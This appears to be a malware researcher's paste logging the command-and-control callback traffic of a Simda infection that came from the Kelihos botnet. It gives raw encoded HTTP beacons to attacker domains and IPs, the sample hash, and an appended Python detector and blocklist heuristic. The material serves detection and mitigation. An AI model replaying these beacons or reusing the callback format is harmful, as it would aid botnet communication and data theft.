MalwareMustDie

#Simda Payload callbacks Traffic (origin: Kelihos Botnet)

Jan 16th, 2014
  1. #MalwareMustDie | Thursday January 16 2014 -- 18:06:48 +02:00
  2. # Simda Payload infection from Kelihos Botnet
  3. # CNC CallBack Traffic | To be blocked/mitigated
  4. # Sample MD5: ca3efa7ee61fba5671b31c98ebd00d77
  5. # VT: https://www.virustotal.com/en/file/aebf4290717b65d6e2256a56949307f0c7b12d9cecd73f366432b3cecf152f3f/analysis/1389888198/
  6. # Analyzed by: @unixfreaxjp
  7.  
  8. // first
  9.  
  10. GET /?K17g31=%96%9C%A5%D3%A5%A7_%C4%99q%9E%94%95l%9D%DB%9D%9Fh%94g%9A%A8c%C9%A2%
  11. A6%B1ij%CB%95%94%98%DC%E6%AC%E9%EA%86%B1%5D%AE%CE%95%9Ej%9C%A8jkY%9D%A5%A0%B0%92
  12. %C8%9C%B0%93W%A4%D0%97n%A4%98%A6%B5%AB%ACb%A4%7Bo%97c%A7%7B%9E%A8klew%7Dz%AAe%A5
  13. %B2%A1%90ik%9BhW%E4%CA%E3%AC%A2%A4%5E%91gl%96a%91i%9B%A6gicagi%A3%5E%89%E5%AA%7B
  14. ag%97cb%B5%9A%96%E1%EC%B1a%93%5B HTTP/1.1
  15. Host: report.a79e1a9ku793179s.com (74.82.216.5)
  16. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727;
  17. .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.
  18. 21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  19.  
  20. (no response)
  21.  
  22. // second
  23.  
  24. POST / HTTP/1.1
  25. Host: report.a79e1a9ku793179s.com (74.82.216.5)
  26. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727;
  27. .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.
  28. 21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  29. Content-Length: 5262
  30. Content-Type: application/x-www-form-urlencoded
  31.  
  32. C555=%96%C7%A7%A2%D4%DA%90%C4%98%9D%9Cb%C4%9C%A2%AC%9Am%99g%9Dr%D9%94%C5%A3%A0ve
  33. hh%A5%C8%96%E1%D3%EBk%D4%A5o%98h%94j%9D%A8p%98%AA%9Ahk%ACf%99%A1%A6xfen%A3%95%A9
  34. %A2%A9%A9%5E%C0%A6%A6%9Bg%94j%A4%AEkogagk%A4f%99%A0%A6wjlm%A8%95%A1%A7%D3%AB%5E%
  35. C4d%9E%C6%96%95f%9F%A5kp%60%92mr%AA%5B%C5%D5%D0y%98kf%A4%9E%D4%A2%D5%D3%8D%93io%
  36. 9Ae%8Ek%9D%ABdkeglm%A9c%90%A1%9Fyji%94%D1%96%A3%A5%A4%A5c%93jq%9DW%D8%AF%A8%EC%A
  37. D%91%83W%AC%A2%D7k%94%A0%A0vg%5B%A1%E0%CC%AD%D3%D7%A1q%A9%5D%A6%CE%95%9Ek%9E%AB%
  38. 7Drkez%7D%A9%60%95%B5%AFvhih%A4%AB%B6%B0%A9%ABp%A4k~%9De%95n%91%E7%9C%ACpagi%A3%
  39. 5E%96%A0%9Dseef%A2%95%A0%9F%A2%A4%5E%91%5D%AF%A2a%91i%9B%A5h%7ChW%A9%B3%B0a%95%9
  40. 5%DF%A8%A5%A4%A7%E6%A2%C3%DE%D8%E8w%CF%AA%AD%C6%9D%CD_%DE%E4%9D%ADpr%9B%A8%D5%93
  41. %83%B5%D9%A4%A8%9DU%C2%D1%D1%E8%D7%E6N%92hY%A6%94%D5%A2%E1%DA%8FF%3Dr%8B%82%93%5
  42. B%83%B3%D6%A8%A3%A8%A9%E2%D7%DF%D6%E4%D5%9B%CEW%B3%DA%A3%81%7D%D0%DE%A5%AC%A7%92
  43. %A3%A5%D4%A2%CC%DE%DBc%99%9A%A7%92%B8%DF%D5%E6%EB%8F%D3%9CFor%D6%AD%DA%BE%ABY%A9
  44. del%A1f%91%A0zMxx%A1%D7%C6%DE%D4%E4%818%AA%A5%AD%CA%9D%89%8B%94%95~%AB%94%A1%9F%
  45. A2%D6%A1%83%BC%D2%A7%9E%96U%B3%C8%D3%D4%DE%D9%A0%C2%AB%A8%D7Q%A5%AB%D4%EB%9C%AB%
  46. 40%3B%80%A7%E7%93%CF%1D%8D%90%96%A3%96%D9%CA%DD%D4%E0%E8%5B%A6%A5%A0%CE%9F%C6f%B
  47. 4%E3%AB%9E%A5%97%98%9C%D8%3Bm%C6%D6%B1%99%A4%AC%E5%85%B9%DD%E6%D9%A0%CF%9C%AD%85
  48. v%D9%A9%D7%E4%A9%9E%A5QoF%7D%81%CC%D2%D5%A8%A7%9D%9A%DB%D9%E3%E4%E2%D8%8F%D5%9CY
  49. %CB%2D%D3Y%C2%DE%A5%9D%A2%A8%AAY%BC%9C%D7%D4%DF%B1%9A%A9U%B7%DD%E0%DB%E1%E6%93%D
  50. 3Wq%85Y%AC%7B%9D%A9ppiegb%808%B6%D8%D0%AB%9A%A7%9D%D7%CE%E4%E2%E7%E4%92%C2%AB%9E
  51. %85%97%5D%AB%8B%CC%A0%A7%97%A0%AE%AC%93w%D1%E3%D2%B5%A3%9A%A9%92%AA%E8%DF%DE%E3%
  52. A0%C6%A9Y%9DQ%89%84%AD%A7ljcfjj%9C%3Bm%B7%DC%B7%9B%9E%AD%92%CB%6C%E1%92%CB%97%CF
  53. %9B%A8%DC%A4%81%91%BB%95_%84ujmr%A3f%97%98zM~%A3%A9%D7%D1%1E%8F%B3%D7%A2%CA%AD%9
  54. E%92~%C2%A7%CC%DC%9C%A6%98%9F%ABf%C7%93%C6%D7%DB%B2%A1%A4%9C%DB%CA%7Dy%BF%DD%91%
  55. D3%A6%AC%D4%97%D5Y%99%C3%7C%8DSw%A9%9A%E0%93%DA%DE%DF%AEUhc%A7%85%BC%D0%E0%DB%A3
  56. %C2%9E%9E%85%81%C2%9C%D6%95%8A%89dQdY%B7s%B8%7Cw%90%9E%98%A7%E1%D8%DF%D5%E6%94%5
  57. C%AF%7C%8D%85w%D3%9A%D8%DA%AE%A8%A5%9CWl%A1c%83%C2%BDtB%3F%82%DB%C8%E2%DE%E5%E3%
  58. 94%D5W%7C%D4%9E%D1%AB%D0%E8%AA%A2%A2%9FW%7C%DF%97%C8%DD%E1c%85%96%98%DD%85%A1%9D
  59. %A2%94%94%D0%A9Y%BC%9A%CF%9D%DA%EC%AAY%8B%81DC%CA%97%D1%D3%DC%BA%A8U%82%D7%C9%D9
  60. %D0%92%BA%9D%D3%A4%9A%D9Q%92j%8B%E7%AC%A7%A7%9A%A4%9E%808%BA%D8%DB%A7%A4%AC%A8%9
  61. 2%B2%D5%D3%DB%D5N%B1%A3%9A%DE%96%D3Y%9C%A6DC%80%9A%9A%AB%E2%A1%D2%D5%E1c%8A%A8%9
  62. A%E4%92%BD%DE%D6%D9N%A5%A9%A2%DB%96%D3Y%B1%E7%98%A6%98%A8%A6%AB%DEN%A9%D4%CE%B7%
  63. AA%A7%9A%92%B5%D1%D2%DD%94_%8FgFoz%CF%AD%D0%E1_%8B%5CQ%87%8B%C2N%B1%D4%E1%BA%A4%
  64. A7%A0%92%A8%DF%DD%E0%D9%91%D5%A0%A8%D3%A4%81j%9D%A3hgdcei%808%B0%D8%D0%B5%A4%A8%
  65. A4%D8%D9%90%BE%D8%DA%97%C4%9CY%B5%A3%D0%9F%D0%E8%AA%A2%A2%9F%98%A5%93s%C7%D8%E1%
  66. AC%A4%A3U%A4%95%A0%A2%7F~%85%CA%A5%9B%D4%9F%C5Y%BF%C5%84Yw%96%AD%A2%D6%93%83%B3%
  67. DF%AC%AB%9A%A7%7Fo%C7%D8%E0%D8%9D%D8%AAY%A9%96%C7%9E%D9%D9%9C%AB%40%3B%84%A2%D6%
  68. A0%D2%E2%DC%A9%A9Uc%C0%AA%C4%8F%B8%E6%8F%CE%9C%B0%D4%A3%CCY%9E%A3gY%86%96%A9%AF%
  69. DC%91%C8%8F%BD%A4%98%A0U%A4rz%B0%D6%E3%90%C6W%8B%CA%92%C5%9E%DD%95pgg_gF%7D%7B%C
  70. C%D2%DF%B2%A8%A4%9B%E6%85%9E%BD%B7%C8N%A7%A9%9A%D2%96%D8%A8%DD%E0WkaaW%8C%D8%A0%
  71. D9%D8%D0%A8U%85%96%D5%D0%90%A1%7F~%7B%CA%9A%AB%D4%A4%D0%9F%DF%95e%87x%85W%7F%E5%
  72. 8F%D0%D4%E4%B2%A7%A0U%A5%93%A0%8F%C5%D9%A0%D7%A0%9C%CAQ%B1%9A%CE%E0WkS%7D%98%A7%
  73. DA%A3%C4%D6%D2c%85%96%98%DD%85%9D%8F%B6%B9%83nA%86%CE%94%D3%A8%DE%E4%9D%ADS_%85~
  74. %C7N%A9%E1%CE%B0%9A%AC%A4%E4%D0%90%A1%A0%A4N%B4%9C%AB%DB%9A%C4%9E%8B%C5%98%9C%9E
  75. QiY%BF%8F%D1%D6%E2%A4%9C%9AU%C2%C6%D3%DA%92%A1N%A5%7C%8Er%3B%B5%B0%D0%D6%A2%AE%9
  76. CQ%87%A8%EA%93%D5%E3%DC%BCU%9B%A4%E4%85%C7%D8%E0%D8%9D%D8%AAY%BD%81nC%BE%DA%9A%A
  77. E%A5%9A%AB%B2%93%83%D3%D3%CE%B7%9AU%9B%E1%D7%90%BC%DB%D7%A0%D0%AA%A8%CB%A5%81g%B
  78. 9%BA%8BYy%A3%98%A6%D8%A5%D2%E1%D8chcj%92%B8%C0%A0%92%9Cy%A3im%96g%95p%9E%9EDC%7B
  79. %A0%AB%9F%DC%A6%83%D5%DC%B5U%82%9E%D5%D7%DF%E2%E1%DA%A2%81e%87%AA%85%81%7F%DD%D6
  80. %A4%9E%AA%A0%A9%A4%93a%91%A4%8D%96%85fU%9A%B0%B2%A8%A7%A7c%9Albr%3B%A9%A8%DF%DB%
  81. A0%B1S%97%A6%AB%93%7B%CC%D2%DF%B2%A8%A4%9B%E6%85%9E%BD%B7%C8N%A7%A9%9A%D2%96%D8%
  82. A8%DD%E0WlafW%8C%C3_%83%97%B8%85njm%A6%9D%A4%98%7F~%81%D0%AC%A7%C9~%A2%91x%7F%84
  83. %A2%96%A3%A6%AC%E2%94%D7%8F%C3%AC%A8%AA%96%DE%85%B3%9A%9D%94%60%91hi%85Q%D9q%A1%
  84. 95%89%9E%97%9A%AA%AD%E5%97%C5%E4%E1%A4%97%A1%9A%92%92%90%A0%A2%A2%5E%8Fki%97b%9A
  85. Fu%9B%A7%AB%A2%94t%94%C6%A7%D6%E3%D2%B0U%85%A7%E1%C8%D5%E2%E5%D1%3Bk%8A%B2%D8%A5
  86. %C6%A6x%7F%AA%A6%A6%A4e%9E%EB%93py%D0%B6%A7%A8%A8%A0%CA%E8%D4%7F~%A5%CA%A5%A5%D4
  87. %98%D0%A7%99%DA%AF%9E%40%3B%AA%9E%E5%A4%CC%D2%D2%B6c%9A%AD%D7rz%DB%E5%D5%A1%D4e%
  88. 9E%DD%96nC%AF%BB%8A%9E%A5%A7e%9E%EB%93py%E0%B9%98%9D%A4%E5%D9%9E%D4%EA%D9%3Bk%AA
  89. %AF%C8%99%D0%AC%DF%A3%9C%B1%98%3EA%AC%E9%91%CB%DE%E0%B7c%9A%AD%D7rz%E2%E8%D7%96%
  90. D0%AA%AD%93%96%D9%9Ex%7F%9C%B1%A3%9D%A6%AB%D8%A0%91%D4%E5%A8B%3F%A8%E2%D4%DF%DB%
  91. E5%EA%5C%C6%AF%9Er%3B%D4%A6%CC%EDk%A9%A1%A1e%9E%EB%93py%C0%90%96%ADi%A0%CA%E8%D4
  92. %7F~%91%D5%9D%A6%D4%9F%8F%9E%E3%DADC%A5%A6%A5%9D%DF%9A%96%A1%9B%A8%AD%9AB%7C%D8%
  93. E6%D2%DA%E3%A1%D5e%9E%DD%96nC%CC%E9%9A%A1%9E%A4%A9%AF%A1%93%DB%D4zM%81%82%88%A0%
  94. CA%E8%D4%7F~%83%AF%8Ag%CA%A9%C6Fu%D6%A3%A0a%96%AF%9E%808%A9%E1%E7%96%A9%96%A9%D7
  95. %97%DB%9D%D7%EC%93nA%8C%DE%A4%D5%9E%D8%82A%8C%AC%A4%AB%9E%E0%3Bm%C2%E6%B6%A9%9A%
  96. A2%7Fo%C3%E8%E5%E8%93%CEDC%B8%AA%D4%AD%D0%E2DC%AA%9E%A0%A9%E5%A4%D6%D4%9B%A8%AD%
  97. 9AB%7C%B8%E9%E2%E6%D9%9BnA%B2%C6%9F%CA%9C%D3%D6e%9E%AB%96DC%97
  98.  
  99. (no response)
  100.  
  101. // third
  102.  
  103. GET /?ai=kaXUncPZnWOPzqeXm5KXo5bPzGaYY5qi0KilnZrXlpdkj9qh19XX4M3VzaifoczW25vUxdX
  104. Vopp4s7pn08PTvJrCpVzRmsfc1tmtlMWtx5dmmtiXmcaXopObnZzGXpmkpKjTl5atnpVfzq1Y1srJrpO
  105. cnnybZpeysauilqe2mGVinKl4r6KcqKOsnHuaYpekkQ%3D%3D HTTP/1.1
  106. Host: update2.iw2iaeqaih6b.com (65.98.83.117)
  107. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre
  108. Connection: Keep-Alive
  109.  
  110. // response:
  111.  
  112. HTTP/1.1 200 OK
  113. Server: nginx
  114. Date: Thu, 16 Jan 2014 08:17:20 GMT
  115. Content-Type: text/html
  116. Transfer-Encoding: chunked
  117. Connection: close
  118. X-Powered-By: PHP/5.3.5
  119.  
  120. 80
  121. 59fbca219566add957ae4ef867779cc87ebb082168e31c102a4e5f709a3cb447a0b2b46c45539e72
  122. 111605b98ce12de3f727ff583bca4746ed2a66b06b5690b3
  123. 0
  124.  
  125. // fourth
  126.  
  127. GET /?7w3uOC343=%96%C9%D2%D3%D4%DA%8F%94n%9B%96a%C3%9E%9F%AAo%9Dkbgk%A9%90%93%9F
  128. %9Fj%ACh%A9%B4wY%AB%A9%AF%DC%E6%C7%C2%9A%A3%CA%9Bv%96b%94l%9D%9B%A3%A7%9An%9B%9E
  129. %A0q%AB%95%DA%A0%DBp%A7%82yymk%A6%A8%B4%A5%A4%A6t%A3jl%99d%93%7F%B1%B6nputk~%ABb
  130. %97%A4%93%A9%DC%A6%B2%7Fscdc%A6%98%A0%9F%A2%A4_%91gi%95a%91i%9B%9B%ADvcagi%A3_%A
  131. 6%A4%93%A9%F1p%A8%81g HTTP/1.1
  132. Host: report.a79e1a9ku793179s.com (74.82.216.5)
  133. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727;
  134. .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648;
  135. .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  136.  
  137. (no response)
  138.  
  139. // fifth
  140.  
  141. GET /?9m1gM20=%96%97%A2%D0%A7%AC%91%99%9C%9C%C7d%94%9F%A1%AAij%98h%9Ar%ACc%9C%A3
  142. %9F%9E%A6%96%99%B0bV%E9%DB%AD%E6%E8%CC~%87%AC%A2%C9n%92j%9E%A8i_%9F%9F%9Ev%D7%93
  143. %90%B2%B5_%DA%9A%CB%8Adc%A8%AB%A9%A7%A6%B7r%97ik%ABs%94l%9F%A8i%7Fyrnp%B5q%97%B4
  144. %A5m%A1f%8D%BF%97%A3%AF%95%A0%9F%A2%A4%60%91gi%95a%92i%9B%A5gicag_%E9k%93%9F%9Di
  145. %9Db%AA%82X%A2%EC%A2%A3%A1%96 HTTP/1.1
  146. Host: report.a79e1a9ku793179s.com (74.82.216.5)
  147. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727;
  148. .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.
  149. 21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  150.  
  151. (no response)
  152.  
  153. // sixth
  154.  
  155. GET /?5g5iQ17=%96%9D%D2%D4%D4%D8%94%C5%9D%9D%C8%94%91q%A4%AAj%9D%96gkm%AB%92%97%
  156. D3%D3m%A0%9B%9E%88g%5D%E9%DB%AD%E6%E8%CC~%87%AC%A2%C9n%92j%9E%A8i_%9F%9F%9Ev%D7%
  157. 93%90%B2%B5%5B%D4%9E%CD%8Ecj%A8%AB%A9%A7%A6%B7r%97ik%ABs%94l%9F%A8i%7Fyrnp%B5q%9
  158. 7%B4%A5i%9Bj%8F%C3%96%AA%AF%96%A0%9F%A2%A4_%98gi%95a%92i%9B%A5gicag_%E9k%93%9F%9
  159. De%97f%AC%86W%A9%EC%A2%A3%A1%96 HTTP/1.1
  160. Host: report.a79e1a9ku793179s.com (74.82.216.5)
  161. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727;
  162. .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.
  163. 21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  164.  
  165. (no response)
  166.  
  167. // seventh
  168.  
  169. GET /?793179316=%96%9B%D3%D4%D4%A8%92%C2ki%9Ae%92%9E%9E%A6%98ri%93kk%AB%5E%96%9F
  170. %CF%9Dmga%99pY%A8%AC%AF%DC%E6%C7%C2%9A%A3%CA%9Bv%96b%94l%9D%9B%A3%A7%9An%9B%9E%A
  171. 0q%AB%95%DA%A0%9Dpcjoyjn%A6%A8%B4%A5%A4%A6t%A3jl%99d%93%7F%B1%B6nputk~%ABb%97%A4
  172. %93%A9%9E%A6nhicaf%A3%9B%A0%9F%A2%A4_%91gi%95a%91i%9B%9B%ADvcagi%A3_%A6%A4%93%A9
  173. %B3pdi%5D HTTP/1.1
  174. Host: report.a79e1a9ku793179s.com (74.82.216.5)
  175. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727;
  176. .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.
  177. 21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  178.  
  179. (no response)
  180.  
  181. // eighth
  182.  
  183. GET /?1e9317904=%96%95%A0%A3%D4%A7%92%9Ahk%96b%94l%A4%ABlphfp%9E%A5b%C8%A7%9Fd%C
  184. Bl%96%96g_%A7%AA%AF%DC%E6%C7%C2%9A%A3%CA%9Bv%96b%94l%9D%9B%A3%A7%9An%9B%9E%A0q%A
  185. B%95%DA%9A%C9vedm%7Fil%A6%A8%B4%A5%A4%A6t%A3jl%99d%93%7F%B1%B6nputk~%ABb%97%A4%9
  186. 3%A3%CA%ACpagi%60d%A2%99%A0%9F%A2%A4_%91gi%95a%91i%9B%9B%ADvcagi%A3_%A6%A4%93%A3
  187. %DFvfc%5B HTTP/1.1
  188. Host: report.a79e1a9ku793179s.com (74.82.216.5)
  189. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727;
  190. .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.
  191. 21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  192.  
  193. (no response)
  194.  
  195. // ninth
  196.  
  197. GET /?1e93126=%96%C9%D2%D3%D4%DA%8F%94n%9B%96a%C3%9E%9F%AAo%9Dkbgk%A9%90%93%9F%9
  198. Fd%9Ang%96f%5C%E9%DB%AD%E6%E8%CC~%87%AC%A2%C9n%92j%9E%A8i_%9F%9F%9Ev%D7%93%90%B2
  199. %B5W%D2%A2%97ndi%A8%AB%A9%A7%A6%B7r%97ik%ABs%94l%9F%A8i%7Fyrnp%B5q%97%B4%A5e%99n
  200. Y%A3%97%A9%AF%95%A0%9F%A2%A4%60%97gi%95a%92i%9B%A5gicag_%E9k%93%9F%9Da%95jvfX%A8
  201. %EC%A2%A3%A1%96 HTTP/1.1
  202. Host: report.a79e1a9ku793179s.com (74.82.216.5)
  203. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727;
  204. .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.
  205. 21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  206.  
  207. (no response)
  208.  
  209. [...]
  210.  
  211. GET /chrome/report.html?1uOCE=%9B%EE%EDk%D9%DF%C6%B7T%D8%D8%D1n%A6%80vx%A9%9D%E3
  212. %9C%C9%A6%D2%CC%5B%A6%B7%93%9E%DE%B3%80w%AA%AD%BDg%9A%9D%B1%ABd%95%A1%B3s%A8%82w
  213. x%A9%BD%BDo%99%A0%B0%AAb%A8%A7%A1e%AAu%B5%AA%EA%B4%A7%5E%92%99%9E%99c%93%9F%9Da%
  214. A6%7Fsu%A7%A7%A7%5E%92%8F%E4%A4%5E%93%9F%9Da%A6%92xk%E9%F1%B4a%94%8D HTTP/1.1
  215. Host: www.bing.com (204.79.197.200)
  216. User-Agent: ?M4 (?c; ?I8; ?T; ?N 2.0.50727; ?N 1.1.4322; ?N 3.0.04506.590; ?N 3.
  217. 0.04506.648; ?N 3.5.21022; ?N 3.0.4506.2152; ?N 3.5.30729)
  218. 113320D88452A5583050947D414DFA8D448AC
  219.  
  220. (no response)
  221.  
  222. // and back to the previous repetition..
  223.  
  224. ---
  225. #MalwareMustDie
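The callbacks above share one shape: a single short alphanumeric query key (K17g31, C555, ai, 7w3uOC343, 1uOCE ...) carrying an opaque blob, either percent-encoded bytes that mostly sit in the 0x80-0xEC range or, for the update2 host, base64 text with %3D%3D padding that decodes to the same kind of bytes; the final request sends the same blob to www.bing.com under a mangled "?M4 (?c; ?I8; ...)" User-Agent. The Python below is an added example for this page, not MalwareMustDie's tooling and not a published Simda signature: it scores request targets copied from the capture with that shape. The thresholds HIGH_BYTE_RATIO and MIN_BLOB_LEN, the key regex, and the benign example.com request are assumptions.

```python
"""Heuristics for the Simda callback shape seen in the capture above.

Added example for this page; it is not MalwareMustDie's tooling and the
thresholds below are assumptions tuned to this sample, not a published
Simda signature.
"""
from __future__ import annotations

import base64
import re
from urllib.parse import unquote_to_bytes, urlsplit

# (Host, request target) pairs copied from the capture. The K17g31= and 1uOCE=
# queries are cut after their first two lines; the ai= query is joined across
# its three lines. The example.com request is constructed as a benign control.
CAPTURE = [
    ("report.a79e1a9ku793179s.com",
     "/?K17g31=%96%9C%A5%D3%A5%A7_%C4%99q%9E%94%95l%9D%DB%9D%9Fh%94g%9A%A8c%C9%A2%"
     "A6%B1ij%CB%95%94%98%DC%E6%AC%E9%EA%86%B1%5D%AE%CE%95%9Ej%9C%A8jkY%9D%A5%A0%B0%92"),
    ("update2.iw2iaeqaih6b.com",
     "/?ai=kaXUncPZnWOPzqeXm5KXo5bPzGaYY5qi0KilnZrXlpdkj9qh19XX4M3VzaifoczW25vUxdX"
     "Vopp4s7pn08PTvJrCpVzRmsfc1tmtlMWtx5dmmtiXmcaXopObnZzGXpmkpKjTl5atnpVfzq1Y1srJrpO"
     "cnnybZpeysauilqe2mGVinKl4r6KcqKOsnHuaYpekkQ%3D%3D"),
    ("www.bing.com",
     "/chrome/report.html?1uOCE=%9B%EE%EDk%D9%DF%C6%B7T%D8%D8%D1n%A6%80vx%A9%9D%E3"
     "%9C%C9%A6%D2%CC%5B%A6%B7%93%9E%DE%B3%80w%AA%AD%BDg%9A%9D%B1%ABd%95%A1%B3s%A8%82w"),
    ("example.com", "/search?q=simda+botnet&page=2"),  # constructed benign request
]

# Every callback in the capture uses exactly one short alphanumeric key
# (K17g31, C555, ai, 7w3uOC343, 1uOCE ...) carrying an opaque blob.
KEY_RE = re.compile(r"[A-Za-z0-9]{1,12}")
BASE64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")
HIGH_BYTE_RATIO = 0.5   # assumption: the sample blobs run at roughly 0.75
MIN_BLOB_LEN = 32       # assumption: ignore short opaque values
# The last request rewrites each MSIE User-Agent token as "?X": "?M4 (?c; ?I8; ...".
MANGLED_UA_TOKEN = re.compile(r"\?[A-Za-z]\d?\b")


def decode_blob(raw_value: str) -> tuple[str, bytes]:
    """Undo the transport layer: %xx-escaped bytes, or base64 text (the ai= form).

    Returns ("percent", bytes) or ("base64", bytes). The inner Simda encoding
    is left untouched; only its byte distribution is scored.
    """
    data = unquote_to_bytes(raw_value)
    text = data.decode("ascii", errors="ignore")
    if len(text) == len(data) and len(text) % 4 == 0 and BASE64_RE.fullmatch(text):
        try:
            return "base64", base64.b64decode(text, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            pass
    return "percent", data


def classify(target: str) -> dict:
    """Score one request target (path + query); returns its features and a verdict."""
    params = [p.partition("=") for p in urlsplit(target).query.split("&") if p]
    feats = {"params": len(params), "verdict": False}
    if len(params) != 1:
        return feats
    key, _, raw = params[0]
    encoding, payload = decode_blob(raw)
    high = sum(b >= 0x80 for b in payload)
    ratio = high / len(payload) if payload else 0.0
    feats.update(key=key, encoding=encoding, length=len(payload), high_ratio=round(ratio, 2))
    feats["verdict"] = (KEY_RE.fullmatch(key) is not None
                        and len(payload) >= MIN_BLOB_LEN
                        and ratio >= HIGH_BYTE_RATIO)
    return feats


def mangled_user_agent(ua: str) -> bool:
    """True for the "?M4 (?c; ?I8; ?T; ?N ...)" User-Agent the bot sends to bing.com."""
    return len(MANGLED_UA_TOKEN.findall(ua)) >= 3


def blocklist(capture) -> list[str]:
    """Hosts that received a flagged callback; see the note on bing.com below."""
    return sorted({host for host, target in capture if classify(target)["verdict"]})


if __name__ == "__main__":
    for host, target in CAPTURE:
        print(host, classify(target))
    print("flagged hosts:", blocklist(CAPTURE))
```

The POST in the second request carries the same shape in its form body, so `classify("/?" + body)` scores it the same way. Note that `blocklist` returns www.bing.com alongside the two attacker-registered domains, because the bot sends its beacon to a legitimate host; block and alert on the request shape plus the report.* and update2.* domains and their IPs, not on the host list alone, and remember that the "(no response)" beacons still reach the server, so the mitigation has to sit at egress.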